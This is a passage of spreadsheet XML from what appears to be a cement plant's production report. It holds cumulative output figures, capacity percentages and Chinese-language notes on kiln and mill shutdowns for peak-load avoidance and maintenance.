      <c r="N56" s="195"/>
      <c r="O56" s="258" t="s">
        <v>282</v>
      </c>
      <c r="P56" s="259" t="s">
        <v>229</v>
      </c>
      <c r="Q56" s="260" t="str">
        <f>'[8]23'!$Q$62</f>
        <v>1#窑:续停。2#窑:续停。水泥磨:1#磨：8:00-24:00避峰停机；2#磨：9:45-22:10避峰停机；3#磨：9:35-22:10避峰停机；4#磨：9:35-22:10避峰停机。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G57+'22'!H57</f>
        <v>0</v>
      </c>
      <c r="I57" s="194">
        <f>H57+yc!I57</f>
        <v>0</v>
      </c>
      <c r="J57" s="194">
        <f>SUM(J58:J59)</f>
        <v>0</v>
      </c>
      <c r="K57" s="194">
        <f>J57+'22'!K57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G58+'22'!H58</f>
        <v>0</v>
      </c>
      <c r="I58" s="194">
        <f>H58+yc!I58</f>
        <v>0</v>
      </c>
      <c r="J58" s="194"/>
      <c r="K58" s="194">
        <f>J58+'22'!K58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G59+'22'!H59</f>
        <v>0</v>
      </c>
      <c r="I59" s="194">
        <f>H59+yc!I59</f>
        <v>0</v>
      </c>
      <c r="J59" s="194"/>
      <c r="K59" s="194">
        <f>J59+'22'!K59</f>
        <v>0</v>
      </c>
      <c r="L59" s="194">
        <f>K59+yc!L59</f>
        <v>0</v>
      </c>
      <c r="M59" s="194"/>
      <c r="N59" s="195"/>
      <c r="O59" s="263"/>
      <c r="P59" s="264" t="s">
        <v>237</v>
      </c>
      <c r="Q59" s="271" t="str">
        <f>'[8]23'!$Q$65</f>
        <v>窑:错峰续停。A组磨：8:00-24:00避峰停机。D1#磨：8:00-18:00避峰停机，D2#磨：8:00-18:00避峰停机。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G60+'22'!H60</f>
        <v>0</v>
      </c>
      <c r="I60" s="194">
        <f>H60+yc!I60</f>
        <v>0</v>
      </c>
      <c r="J60" s="194"/>
      <c r="K60" s="194">
        <f>J60+'22'!K60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'[14]23'!$D$6</f>
        <v>37769.1699999999</v>
      </c>
      <c r="G61" s="225">
        <f>'[14]23'!$E$6</f>
        <v>4397</v>
      </c>
      <c r="H61" s="194">
        <f>G61+'22'!H61</f>
        <v>85048</v>
      </c>
      <c r="I61" s="194">
        <f>H61+yc!I61</f>
        <v>1200921</v>
      </c>
      <c r="J61" s="194">
        <f>'[14]23'!$E$21</f>
        <v>4471.16</v>
      </c>
      <c r="K61" s="194">
        <f>J61+'22'!K61</f>
        <v>90499.22</v>
      </c>
      <c r="L61" s="194">
        <f>K61+yc!L61</f>
        <v>1191659.3</v>
      </c>
      <c r="M61" s="194">
        <f>'[14]23'!$H$6</f>
        <v>32317.9499999999</v>
      </c>
      <c r="N61" s="195">
        <f>M61/52000*100</f>
        <v>62.1499038461537</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'[14]23'!$M$11+'[14]23'!$M$12+'[14]23'!$M$13+'[14]23'!$M$14+'[14]23'!$M$15+'[14]23'!$M$16+'[14]23'!$M$17+'[14]23'!$M$18</f>
        <v>18454.634</v>
      </c>
      <c r="G62" s="225">
        <f>'[14]23'!$N$11+'[14]23'!$N$12+'[14]23'!$N$13+'[14]23'!$N$14+'[14]23'!$N$15+'[14]23'!$N$16+'[14]23'!$N$17+'[14]23'!$N$18</f>
        <v>2680</v>
      </c>
      <c r="H62" s="194">
        <f>G62+'22'!H62</f>
        <v>63516</v>
      </c>
      <c r="I62" s="194">
        <f>H62+yc!I62</f>
        <v>899509.456</v>
      </c>
      <c r="J62" s="194">
        <f>'[14]23'!$Q$11+'[14]23'!$Q$12+'[14]23'!$Q$13+'[14]23'!$Q$14+'[14]23'!$Q$15+'[14]23'!$Q$16+'[14]23'!$Q$17+'[14]23'!$Q$18</f>
        <v>3315</v>
      </c>
      <c r="K62" s="194">
        <f>J62+'22'!K62</f>
        <v>60935</v>
      </c>
      <c r="L62" s="194">
        <f>K62+yc!L62</f>
        <v>895407.796</v>
      </c>
      <c r="M62" s="194">
        <f>'[14]23'!$T$11+'[14]23'!$T$12+'[14]23'!$T$13+'[14]23'!$T$14+'[14]23'!$T$15+'[14]23'!$T$16+'[14]23'!$T$17+'[14]23'!$T$18</f>
        <v>21035.634</v>
      </c>
      <c r="N62" s="207">
        <f>(M62+M63)/25000*100</f>
        <v>84.1425359999998</v>
      </c>
      <c r="O62" s="263"/>
      <c r="P62" s="274" t="s">
        <v>252</v>
      </c>
      <c r="Q62" s="271" t="str">
        <f>'[8]23'!$Q$71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'[14]23'!$M$19+'[14]23'!$M$20</f>
        <v>-2.00373051484348e-12</v>
      </c>
      <c r="G63" s="225">
        <f>'[14]23'!$N$19+'[14]23'!$N$20</f>
        <v>0</v>
      </c>
      <c r="H63" s="194">
        <f>G63+'22'!H63</f>
        <v>0</v>
      </c>
      <c r="I63" s="194">
        <f>H63+yc!I63</f>
        <v>0</v>
      </c>
      <c r="J63" s="194">
        <f>'[14]23'!$Q$19+'[14]23'!$Q$20</f>
        <v>0</v>
      </c>
      <c r="K63" s="194">
        <f>J63+'22'!K63</f>
        <v>0</v>
      </c>
      <c r="L63" s="194">
        <f>K63+yc!L63</f>
        <v>0</v>
      </c>
      <c r="M63" s="194">
        <f>'[14]23'!$T$19+'[14]23'!$T$20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G64+'22'!H64</f>
        <v>0</v>
      </c>
      <c r="I64" s="194">
        <f>H64+yc!I64</f>
        <v>0</v>
      </c>
      <c r="J64" s="194">
        <f>J65</f>
        <v>0</v>
      </c>
      <c r="K64" s="194">
        <f>J64+'22'!K64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G65+'22'!H65</f>
        <v>0</v>
      </c>
      <c r="I65" s="194">
        <f>H65+yc!I65</f>
        <v>0</v>
      </c>
      <c r="J65" s="194">
        <f>SUM(J66:J67)</f>
        <v>0</v>
      </c>
      <c r="K65" s="194">
        <f>J65+'22'!K65</f>
        <v>0</v>
      </c>
      <c r="L65" s="194">
        <f>K65+yc!L65</f>
        <v>0</v>
      </c>
      <c r="M65" s="194"/>
      <c r="N65" s="195"/>
      <c r="O65" s="263"/>
      <c r="P65" s="264" t="s">
        <v>304</v>
      </c>
      <c r="Q65" s="271" t="str">
        <f>'[8]23'!$Q$74</f>
        <v>1#窑:续停；2#窑:窑减产，窑尾托轮轴瓦磨合；1#磨:0:00-0:15,10:00-24:00避峰停机。2#磨:10:00-24:00避峰停机。3#磨:14:50-24:00库满停机。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G66+'22'!H66</f>
        <v>0</v>
      </c>
      <c r="I66" s="194">
        <f>H66+yc!I66</f>
        <v>0</v>
      </c>
      <c r="J66" s="194"/>
      <c r="K66" s="194">
        <f>J66+'22'!K66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G67+'22'!H67</f>
        <v>0</v>
      </c>
      <c r="I67" s="194">
        <f>H67+yc!I67</f>
        <v>0</v>
      </c>
      <c r="J67" s="194"/>
      <c r="K67" s="194">
        <f>J67+'22'!K67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'[15]23'!$D$6</f>
        <v>1502.56</v>
      </c>
      <c r="G68" s="194">
        <f>'[15]23'!$E$6</f>
        <v>0</v>
      </c>
      <c r="H68" s="194">
        <f>G68+'22'!H68</f>
        <v>0</v>
      </c>
      <c r="I68" s="194">
        <f>H68+yc!I68</f>
        <v>0</v>
      </c>
      <c r="J68" s="194">
        <f>'[15]23'!$H$6</f>
        <v>0</v>
      </c>
      <c r="K68" s="194">
        <f>J68+'22'!K68</f>
        <v>0</v>
      </c>
      <c r="L68" s="194">
        <f>K68+yc!L68</f>
        <v>0</v>
      </c>
      <c r="M68" s="194">
        <f>'[15]23'!$K$6</f>
        <v>1502.56</v>
      </c>
      <c r="N68" s="195">
        <f>M68/50000*100</f>
        <v>3.00512</v>
      </c>
      <c r="O68" s="263"/>
      <c r="P68" s="264" t="s">
        <v>262</v>
      </c>
      <c r="Q68" s="271" t="str">
        <f>'[8]23'!$Q$77</f>
        <v>1#磨0:00-6:00供电所检修停电停机:6小时(其它)。2#磨0:00-7:30供电所检修停电停机:7.5小时(其它)。</v>
      </c>
      <c r="R68" s="272"/>
      <c r="S68" s="272"/>
      <c r="T68" s="272"/>
      <c r="U68" s="272"/>
      <c r="V68" s="272"/>
      <c r="W68" s="272"/>
      <c r="X68" s="272"/>
      <c r="Y68" s="272"/>
      <c r="Z68" s="273"/>
    </row>
    <row r="69" ht="15.75" customHeight="1" spans="1:26">
      <c r="A69" s="191"/>
      <c r="B69" s="193" t="s">
        <v>283</v>
      </c>
      <c r="C69" s="193"/>
      <c r="D69" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E69" s="194"/>
      <c r="F69" s="194">
        <f>'[15]23'!$D$43+'[15]23'!$D$44</f>
        <v>467.66</v>
      </c>
      <c r="G69" s="194">
        <f>'[15]23'!$E$43+'[15]23'!$E$44</f>
        <v>0</v>
      </c>
      <c r="H69" s="194">
        <f>G69+'22'!H69</f>
        <v>0</v>
      </c>
      <c r="I69" s="194">
        <f>H69+yc!I69</f>
        <v>0</v>
      </c>
      <c r="J69" s="194">
        <f>'[15]23'!$H$43+'[15]23'!$H$44</f>
        <v>0</v>
      </c>
      <c r="K69" s="194">
        <f>J69+'22'!K69</f>
        <v>0</v>
      </c>
      <c r="L69" s="194">
        <f>K69+yc!L69</f>
        <v>0</v>
      </c>
      <c r="M69" s="194">
        <f>'[15]23'!$K$43+'[15]23'!$K$44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'[15]23'!$D$45</f>
        <v>0</v>
      </c>
      <c r="G70" s="194">
        <f>'[15]23'!$E$45</f>
        <v>0</v>
      </c>
      <c r="H70" s="194">
        <f>G70+'22'!H70</f>
        <v>0</v>
      </c>
      <c r="I70" s="194">
        <f>H70+yc!I70</f>
        <v>0</v>
      </c>
      <c r="J70" s="194">
        <f>'[15]23'!$H$45</f>
        <v>0</v>
      </c>
      <c r="K70" s="194">
        <f>J70+'22'!K70</f>
        <v>0</v>
      </c>
      <c r="L70" s="194">
        <f>K70+yc!L70</f>
        <v>0</v>
      </c>
      <c r="M70" s="194">
        <f>'[15]23'!$K$45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G71+'22'!H71</f>
        <v>0</v>
      </c>
      <c r="I71" s="194">
        <f>H71+yc!I71</f>
        <v>0</v>
      </c>
      <c r="J71" s="194">
        <f>J72</f>
        <v>0</v>
      </c>
      <c r="K71" s="194">
        <f>J71+'22'!K71</f>
        <v>0</v>
      </c>
      <c r="L71" s="194">
        <f>K71+yc!L71</f>
        <v>0</v>
      </c>
      <c r="M71" s="194"/>
      <c r="N71" s="195"/>
      <c r="O71" s="263"/>
      <c r="P71" s="264" t="s">
        <v>263</v>
      </c>
      <c r="Q71" s="271" t="str">
        <f>'[8]23'!$Q$80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G72+'22'!H72</f>
        <v>0</v>
      </c>
      <c r="I72" s="194">
        <f>H72+yc!I72</f>
        <v>0</v>
      </c>
      <c r="J72" s="194">
        <f>SUM(J73:J74)</f>
        <v>0</v>
      </c>
      <c r="K72" s="194">
        <f>J72+'22'!K72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G73+'22'!H73</f>
        <v>0</v>
      </c>
      <c r="I73" s="194">
        <f>H73+yc!I73</f>
        <v>0</v>
      </c>
      <c r="J73" s="194"/>
      <c r="K73" s="194">
        <f>J73+'22'!K73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G74+'22'!H74</f>
        <v>0</v>
      </c>
      <c r="I74" s="194">
        <f>H74+yc!I74</f>
        <v>0</v>
      </c>
      <c r="J74" s="194"/>
      <c r="K74" s="194">
        <f>J74+'22'!K74</f>
        <v>0</v>
      </c>
      <c r="L74" s="194">
        <f>K74+yc!L74</f>
        <v>0</v>
      </c>
      <c r="M74" s="194"/>
      <c r="N74" s="195"/>
      <c r="O74" s="263"/>
      <c r="P74" s="278" t="s">
        <v>311</v>
      </c>
      <c r="Q74" s="271" t="str">
        <f>'[8]23'!$Q$83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G75+'22'!H75</f>
        <v>0</v>
      </c>
      <c r="I75" s="194">
        <f>H75+yc!I75</f>
        <v>0</v>
      </c>
      <c r="J75" s="241">
        <f>J76</f>
        <v>0</v>
      </c>
      <c r="K75" s="194">
        <f>J75+'22'!K75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G76+'22'!H76</f>
        <v>0</v>
      </c>
      <c r="I76" s="194">
        <f>H76+yc!I76</f>
        <v>0</v>
      </c>
      <c r="J76" s="241">
        <f>SUM(J77:J78)</f>
        <v>0</v>
      </c>
      <c r="K76" s="194">
        <f>J76+'22'!K76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G77+'22'!H77</f>
        <v>0</v>
      </c>
      <c r="I77" s="194">
        <f>H77+yc!I77</f>
        <v>0</v>
      </c>
      <c r="J77" s="241"/>
      <c r="K77" s="194">
        <f>J77+'22'!K77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G78+'22'!H78</f>
        <v>0</v>
      </c>
      <c r="I78" s="194">
        <f>H78+yc!I78</f>
        <v>0</v>
      </c>
      <c r="J78" s="241"/>
      <c r="K78" s="194">
        <f>J78+'22'!K78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'[16]23'!$E$7</f>
        <v>628.74</v>
      </c>
      <c r="H79" s="194">
        <f>G79+'22'!H79</f>
        <v>12313.1</v>
      </c>
      <c r="I79" s="301">
        <f>H79+yc!I79</f>
        <v>159441.57</v>
      </c>
      <c r="J79" s="301">
        <f>'[16]23'!$I$7</f>
        <v>615.5</v>
      </c>
      <c r="K79" s="194">
        <f>J79+'22'!K79</f>
        <v>11595</v>
      </c>
      <c r="L79" s="301">
        <f>K79+yc!L79</f>
        <v>153486.45</v>
      </c>
      <c r="M79" s="301">
        <f>'[16]23'!$L$7</f>
        <v>5602.88</v>
      </c>
      <c r="N79" s="302">
        <f>M79/50000*100</f>
        <v>11.20576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'[16]23'!$R$15</f>
        <v>0</v>
      </c>
      <c r="H80" s="194">
        <f>G80+'22'!H80</f>
        <v>0</v>
      </c>
      <c r="I80" s="301">
        <f>H80+yc!I80</f>
        <v>0</v>
      </c>
      <c r="J80" s="301">
        <f>'[16]23'!$V$15</f>
        <v>0</v>
      </c>
      <c r="K80" s="194">
        <f>J80+'22'!K80</f>
        <v>0</v>
      </c>
      <c r="L80" s="301">
        <f>K80+yc!L80</f>
        <v>0</v>
      </c>
      <c r="M80" s="301">
        <f>'[16]23'!$Y$15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G81+'22'!H81</f>
        <v>0</v>
      </c>
      <c r="I81" s="301">
        <f>H81+yc!I81</f>
        <v>0</v>
      </c>
      <c r="J81" s="301"/>
      <c r="K81" s="194">
        <f>J81+'22'!K81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G82+'22'!H82</f>
        <v>0</v>
      </c>
      <c r="I82" s="301">
        <f>H82+yc!I82</f>
        <v>0</v>
      </c>
      <c r="J82" s="301"/>
      <c r="K82" s="194">
        <f>J82+'22'!K82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G83+'22'!H83</f>
        <v>0</v>
      </c>
      <c r="I83" s="301">
        <f>H83+yc!I83</f>
        <v>0</v>
      </c>
      <c r="J83" s="301"/>
      <c r="K83" s="194">
        <f>J83+'22'!K83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G84+'22'!H84</f>
        <v>0</v>
      </c>
      <c r="I84" s="301">
        <f>H84+yc!I84</f>
        <v>0</v>
      </c>
      <c r="J84" s="301"/>
      <c r="K84" s="194">
        <f>J84+'22'!K84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G85+'22'!H85</f>
        <v>0</v>
      </c>
      <c r="I85" s="301">
        <f>H85+yc!I85</f>
        <v>0</v>
      </c>
      <c r="J85" s="301"/>
      <c r="K85" s="194">
        <f>J85+'22'!K85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pageSetUpPr fitToPage="1"/>
  </sheetPr>
  <dimension ref="A1:Z158"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <pane xSplit="4" ySplit="4" topLeftCell="E24"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24/31</f>
        <v>0.774193548387097</v>
      </c>
      <c r="J2" s="180"/>
      <c r="K2" s="181"/>
      <c r="L2" s="180"/>
      <c r="M2" s="180"/>
      <c r="N2" s="182">
        <v>46015</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25542.02</v>
      </c>
      <c r="H5" s="194">
        <f>G5+'23'!H5</f>
        <v>505008.93</v>
      </c>
      <c r="I5" s="194">
        <f>H5+yc!I5</f>
        <v>6659874.96</v>
      </c>
      <c r="J5" s="194">
        <f>J21+J31+J41+J51+J61+J68+J79</f>
        <v>24539.972</v>
      </c>
      <c r="K5" s="194">
        <f>J5+'23'!K5</f>
        <v>555291.207</v>
      </c>
      <c r="L5" s="194">
        <f>K5+yc!L5</f>
        <v>6705362.338</v>
      </c>
      <c r="M5" s="194">
        <f>M21+M31+M41+M51+M61+M68+M79</f>
        <v>217185.547</v>
      </c>
      <c r="N5" s="195">
        <f>M5/374000*100</f>
        <v>58.0710018716577</v>
      </c>
      <c r="O5" s="196" t="s">
        <v>228</v>
      </c>
      <c r="P5" s="197" t="s">
        <v>229</v>
      </c>
      <c r="Q5" s="193" t="s">
        <v>291</v>
      </c>
      <c r="R5" s="198">
        <f>'[10]24'!$W$101</f>
        <v>0</v>
      </c>
      <c r="S5" s="198">
        <f>'[10]24'!$X$101</f>
        <v>271.294167565063</v>
      </c>
      <c r="T5" s="198">
        <f>'[10]24'!$Y$101</f>
        <v>260.421411059556</v>
      </c>
      <c r="U5" s="198">
        <f>'[10]24'!$T$101</f>
        <v>0</v>
      </c>
      <c r="V5" s="198">
        <f>'[10]24'!$U$101</f>
        <v>40.0984375</v>
      </c>
      <c r="W5" s="198">
        <f>'[10]24'!$V$101</f>
        <v>63.0154329608938</v>
      </c>
      <c r="X5" s="198">
        <f>'[10]24'!$Q$101</f>
        <v>0</v>
      </c>
      <c r="Y5" s="198">
        <f>'[10]24'!$R$101</f>
        <v>230.967</v>
      </c>
      <c r="Z5" s="198">
        <f>'[10]24'!$S$101</f>
        <v>5414.286</v>
      </c>
    </row>
    <row r="6" ht="15.75" customHeight="1" spans="1:26">
      <c r="A6" s="191"/>
      <c r="B6" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C6" s="193" t="s">
        <v>232</v>
      </c>
      <c r="D6" s="193"/>
      <c r="E6" s="194"/>
      <c r="F6" s="194">
        <f>'[10]24'!$D$23+'[11]24'!$D$17+'[12]24'!$D$17+'[13]24'!$D$25+'[14]24'!$D$8+'[14]24'!$D$15+'[15]24'!$D$7</f>
        <v>32112.84</v>
      </c>
      <c r="G6" s="194">
        <f>'[10]24'!$E$23+'[11]24'!$E$17+'[12]24'!$E$17+'[13]24'!$E$25+'[14]24'!$E$8+'[14]24'!$E$15+'[15]24'!$E$7</f>
        <v>0</v>
      </c>
      <c r="H6" s="194">
        <f>G6+'23'!H6</f>
        <v>6590</v>
      </c>
      <c r="I6" s="194">
        <f>H6+yc!I6</f>
        <v>282939.96</v>
      </c>
      <c r="J6" s="194">
        <f>'[10]24'!$I$23+'[11]24'!$I$17+'[12]24'!$I$17+'[13]24'!$I$25+'[14]24'!$E$23+'[14]24'!$E$30+'[15]24'!$H$7</f>
        <v>1004.7</v>
      </c>
      <c r="K6" s="194">
        <f>J6+'23'!K6</f>
        <v>17888.64</v>
      </c>
      <c r="L6" s="194">
        <f>K6+yc!L6</f>
        <v>280086.34</v>
      </c>
      <c r="M6" s="194">
        <f>'[10]24'!$L$23+'[11]24'!$L$17+'[12]24'!$L$17+'[13]24'!$L$25+'[14]24'!$H$23+'[14]24'!$H$30+'[15]24'!$K$7</f>
        <v>20814.2</v>
      </c>
      <c r="N6" s="195"/>
      <c r="O6" s="199"/>
      <c r="P6" s="200"/>
      <c r="Q6" s="193" t="s">
        <v>292</v>
      </c>
      <c r="R6" s="198">
        <f>'[10]24'!$W$102</f>
        <v>0</v>
      </c>
      <c r="S6" s="198">
        <f>'[10]24'!$X$102</f>
        <v>0</v>
      </c>
      <c r="T6" s="198">
        <f>'[10]24'!$Y$102</f>
        <v>240.280205356462</v>
      </c>
      <c r="U6" s="198">
        <f>'[10]24'!$T$102</f>
        <v>0</v>
      </c>
      <c r="V6" s="198">
        <f>'[10]24'!$U$102</f>
        <v>0</v>
      </c>
      <c r="W6" s="198">
        <f>'[10]24'!$V$102</f>
        <v>33.1145135009311</v>
      </c>
      <c r="X6" s="198">
        <f>'[10]24'!$Q$102</f>
        <v>0</v>
      </c>
      <c r="Y6" s="198">
        <f>'[10]24'!$R$102</f>
        <v>0</v>
      </c>
      <c r="Z6" s="198">
        <f>'[10]24'!$S$102</f>
        <v>2845.199</v>
      </c>
    </row>
    <row r="7" ht="15.75" customHeight="1" spans="1:26">
      <c r="A7" s="191"/>
      <c r="B7" s="191"/>
      <c r="C7" s="201" t="s">
        <v>331</v>
      </c>
      <c r="D7" s="201"/>
      <c r="E7" s="194"/>
      <c r="F7" s="194">
        <f>'[12]24'!$D$22</f>
        <v>0</v>
      </c>
      <c r="G7" s="194">
        <f>'[12]24'!$E$22</f>
        <v>0</v>
      </c>
      <c r="H7" s="194">
        <f>G7+'23'!H7</f>
        <v>0</v>
      </c>
      <c r="I7" s="194">
        <f>H7+yc!I7</f>
        <v>0</v>
      </c>
      <c r="J7" s="194">
        <f>'[12]24'!$I$22</f>
        <v>0</v>
      </c>
      <c r="K7" s="194">
        <f>J7+'23'!K7</f>
        <v>0</v>
      </c>
      <c r="L7" s="194">
        <f>K7+yc!L7</f>
        <v>0</v>
      </c>
      <c r="M7" s="194">
        <f>'[12]24'!$L$22</f>
        <v>0</v>
      </c>
      <c r="N7" s="195"/>
      <c r="O7" s="199"/>
      <c r="P7" s="200"/>
      <c r="Q7" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R7" s="202">
        <f>'[10]24'!$W$107</f>
        <v>0</v>
      </c>
      <c r="S7" s="202">
        <f>'[10]24'!$X$107</f>
        <v>126.793424440483</v>
      </c>
      <c r="T7" s="198">
        <f>'[10]24'!$Y$107</f>
        <v>131.45755109793</v>
      </c>
      <c r="U7" s="198">
        <f>'[10]24'!$T$107</f>
        <v>0</v>
      </c>
      <c r="V7" s="198">
        <f>'[10]24'!$U$107</f>
        <v>43.828125</v>
      </c>
      <c r="W7" s="198">
        <f>'[10]24'!$V$107</f>
        <v>31.8654562383612</v>
      </c>
      <c r="X7" s="198">
        <f>'[10]24'!$Q$107</f>
        <v>0</v>
      </c>
      <c r="Y7" s="198">
        <f>'[10]24'!$R$107</f>
        <v>252.45</v>
      </c>
      <c r="Z7" s="198">
        <f>'[10]24'!$S$107</f>
        <v>2737.88</v>
      </c>
    </row>
    <row r="8" ht="15.75" customHeight="1" spans="1:26">
      <c r="A8" s="191"/>
      <c r="B8" s="191"/>
      <c r="C8" s="201" t="s">
        <v>236</v>
      </c>
      <c r="D8" s="201"/>
      <c r="E8" s="194"/>
      <c r="F8" s="194">
        <f>'[10]24'!$D$27+'[11]24'!$D$18+'[13]24'!$D$26+'[14]24'!$D$10+'[14]24'!$D$17+'[15]24'!$D$9</f>
        <v>41879.9</v>
      </c>
      <c r="G8" s="194">
        <f>'[10]24'!$E$27+'[11]24'!$E$18+'[13]24'!$E$26+'[14]24'!$E$10+'[14]24'!$E$17+'[15]24'!$E$9</f>
        <v>1502</v>
      </c>
      <c r="H8" s="194">
        <f>G8+'23'!H8</f>
        <v>49248</v>
      </c>
      <c r="I8" s="194">
        <f>H8+yc!I8</f>
        <v>574784.99</v>
      </c>
      <c r="J8" s="194">
        <f>'[10]24'!$I$27+'[11]24'!$I$18+'[13]24'!$I$26+'[14]24'!$E$25+'[14]24'!$E$32+'[15]24'!$H$9</f>
        <v>2384.42</v>
      </c>
      <c r="K8" s="194">
        <f>J8+'23'!K8</f>
        <v>60821.04</v>
      </c>
      <c r="L8" s="194">
        <f>K8+yc!L8</f>
        <v>568565.75</v>
      </c>
      <c r="M8" s="194">
        <f>'[10]24'!$L$27+'[11]24'!$L$18+'[13]24'!$L$26+'[14]24'!$H$25+'[14]24'!$H$32+'[15]24'!$K$9</f>
        <v>30306.86</v>
      </c>
      <c r="N8" s="195"/>
      <c r="O8" s="199"/>
      <c r="P8" s="200"/>
      <c r="Q8" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R8" s="198">
        <f>'[10]24'!$W$108</f>
        <v>145.40174249758</v>
      </c>
      <c r="S8" s="198">
        <f>'[10]24'!$X$108</f>
        <v>132.714840140455</v>
      </c>
      <c r="T8" s="198">
        <f>'[10]24'!$Y$108</f>
        <v>128.004377077085</v>
      </c>
      <c r="U8" s="198">
        <f>'[10]24'!$T$108</f>
        <v>43.0416666666667</v>
      </c>
      <c r="V8" s="198">
        <f>'[10]24'!$U$108</f>
        <v>46.9704861111111</v>
      </c>
      <c r="W8" s="198">
        <f>'[10]24'!$V$108</f>
        <v>28.7174115456238</v>
      </c>
      <c r="X8" s="198">
        <f>'[10]24'!$Q$108</f>
        <v>10.33</v>
      </c>
      <c r="Y8" s="198">
        <f>'[10]24'!$R$108</f>
        <v>270.55</v>
      </c>
      <c r="Z8" s="198">
        <f>'[10]24'!$S$108</f>
        <v>2467.4</v>
      </c>
    </row>
    <row r="9" ht="15.75" customHeight="1" spans="1:26">
      <c r="A9" s="191"/>
      <c r="B9" s="191"/>
      <c r="C9" s="201" t="s">
        <v>238</v>
      </c>
      <c r="D9" s="201"/>
      <c r="E9" s="194"/>
      <c r="F9" s="194">
        <f>'[10]24'!$D$24+'[11]24'!$D$19+'[12]24'!$D$20+'[13]24'!$D$27+'[14]24'!$D$11+'[14]24'!$D$18+'[15]24'!$D$10</f>
        <v>110865.712</v>
      </c>
      <c r="G9" s="194">
        <f>'[10]24'!$E$24+'[11]24'!$E$19+'[12]24'!$E$20+'[13]24'!$E$27+'[14]24'!$E$11+'[14]24'!$E$18+'[15]24'!$E$10</f>
        <v>20020</v>
      </c>
      <c r="H9" s="194">
        <f>G9+'23'!H9</f>
        <v>361476</v>
      </c>
      <c r="I9" s="194">
        <f>H9+yc!I9</f>
        <v>4496864.88</v>
      </c>
      <c r="J9" s="194">
        <f>'[10]24'!$I$24+'[11]24'!$I$19+'[12]24'!$I$20+'[13]24'!$I$27+'[14]24'!$E$26+'[14]24'!$E$33+'[15]24'!$H$10</f>
        <v>17325.632</v>
      </c>
      <c r="K9" s="194">
        <f>J9+'23'!K9</f>
        <v>375293.447</v>
      </c>
      <c r="L9" s="194">
        <f>K9+yc!L9</f>
        <v>4472772.258</v>
      </c>
      <c r="M9" s="194">
        <f>'[10]24'!$L$24+'[11]24'!$L$19+'[12]24'!$L$20+'[13]24'!$L$27+'[14]24'!$H$26+'[14]24'!$H$33+'[15]24'!$K$10</f>
        <v>97048.265</v>
      </c>
      <c r="N9" s="195"/>
      <c r="O9" s="199"/>
      <c r="P9" s="200"/>
      <c r="Q9" s="193" t="s">
        <v>294</v>
      </c>
      <c r="R9" s="198">
        <f>'[10]24'!$W$109</f>
        <v>309.298393913779</v>
      </c>
      <c r="S9" s="198">
        <f>'[10]24'!$X$109</f>
        <v>267.547206258753</v>
      </c>
      <c r="T9" s="198">
        <f>'[10]24'!$Y$109</f>
        <v>271.053332711663</v>
      </c>
      <c r="U9" s="198">
        <f>'[10]24'!$T$109</f>
        <v>49.2916666666667</v>
      </c>
      <c r="V9" s="198">
        <f>'[10]24'!$U$109</f>
        <v>35.9496527777778</v>
      </c>
      <c r="W9" s="198">
        <f>'[10]24'!$V$109</f>
        <v>34.9471601489757</v>
      </c>
      <c r="X9" s="198">
        <f>'[10]24'!$Q$109</f>
        <v>11.83</v>
      </c>
      <c r="Y9" s="198">
        <f>'[10]24'!$R$109</f>
        <v>207.07</v>
      </c>
      <c r="Z9" s="198">
        <f>'[10]24'!$S$109</f>
        <v>3002.65999999999</v>
      </c>
    </row>
    <row r="10" ht="15.75" customHeight="1" spans="1:26">
      <c r="A10" s="191"/>
      <c r="B10" s="191"/>
      <c r="C10" s="201" t="s">
        <v>295</v>
      </c>
      <c r="D10" s="201"/>
      <c r="E10" s="194"/>
      <c r="F10" s="194">
        <f>'[10]24'!$D$25+'[11]24'!$D$20+'[12]24'!$D$21+'[13]24'!$D$28+'[14]24'!$D$12+'[14]24'!$D$19+'[15]24'!$D$11</f>
        <v>61206.942</v>
      </c>
      <c r="G10" s="194">
        <f>'[10]24'!$E$25+'[11]24'!$E$20+'[12]24'!$E$21+'[13]24'!$E$28+'[14]24'!$E$12+'[14]24'!$E$19+'[15]24'!$E$11</f>
        <v>3659</v>
      </c>
      <c r="H10" s="194">
        <f>G10+'23'!H10</f>
        <v>58496</v>
      </c>
      <c r="I10" s="194">
        <f>H10+yc!I10</f>
        <v>976023.17</v>
      </c>
      <c r="J10" s="194">
        <f>'[10]24'!$I$25+'[11]24'!$I$20+'[12]24'!$I$21+'[13]24'!$I$28+'[14]24'!$E$27+'[14]24'!$E$34+'[15]24'!$H$11</f>
        <v>2711.5</v>
      </c>
      <c r="K10" s="194">
        <f>J10+'23'!K10</f>
        <v>68475.9</v>
      </c>
      <c r="L10" s="194">
        <f>K10+yc!L10</f>
        <v>965704.62</v>
      </c>
      <c r="M10" s="194">
        <f>'[10]24'!$L$25+'[11]24'!$L$20+'[12]24'!$L$21+'[13]24'!$L$28+'[14]24'!$H$27+'[14]24'!$H$34+'[15]24'!$K$11</f>
        <v>51227.042</v>
      </c>
      <c r="N10" s="195"/>
      <c r="O10" s="199"/>
      <c r="P10" s="200"/>
      <c r="Q10" s="193" t="s">
        <v>296</v>
      </c>
      <c r="R10" s="198">
        <f>'[10]24'!$W$110</f>
        <v>261.284868977177</v>
      </c>
      <c r="S10" s="198">
        <f>'[10]24'!$X$110</f>
        <v>250.131208997188</v>
      </c>
      <c r="T10" s="198">
        <f>'[10]24'!$Y$110</f>
        <v>267.50921926743</v>
      </c>
      <c r="U10" s="198">
        <f>'[10]24'!$T$110</f>
        <v>49.2916666666667</v>
      </c>
      <c r="V10" s="198">
        <f>'[10]24'!$U$110</f>
        <v>37.0486111111111</v>
      </c>
      <c r="W10" s="198">
        <f>'[10]24'!$V$110</f>
        <v>34.6538640595903</v>
      </c>
      <c r="X10" s="198">
        <f>'[10]24'!$Q$110</f>
        <v>11.83</v>
      </c>
      <c r="Y10" s="198">
        <f>'[10]24'!$R$110</f>
        <v>213.4</v>
      </c>
      <c r="Z10" s="198">
        <f>'[10]24'!$S$110</f>
        <v>2977.46</v>
      </c>
    </row>
    <row r="11" ht="15.75" customHeight="1" spans="1:26">
      <c r="A11" s="191"/>
      <c r="B11" s="191"/>
      <c r="C11" s="201" t="s">
        <v>297</v>
      </c>
      <c r="D11" s="201"/>
      <c r="E11" s="194"/>
      <c r="F11" s="194">
        <f>'[10]24'!$D$26+'[11]24'!$D$21+'[12]24'!$D$19+'[13]24'!$D$29+'[14]24'!$D$13+'[14]24'!$D$20</f>
        <v>0</v>
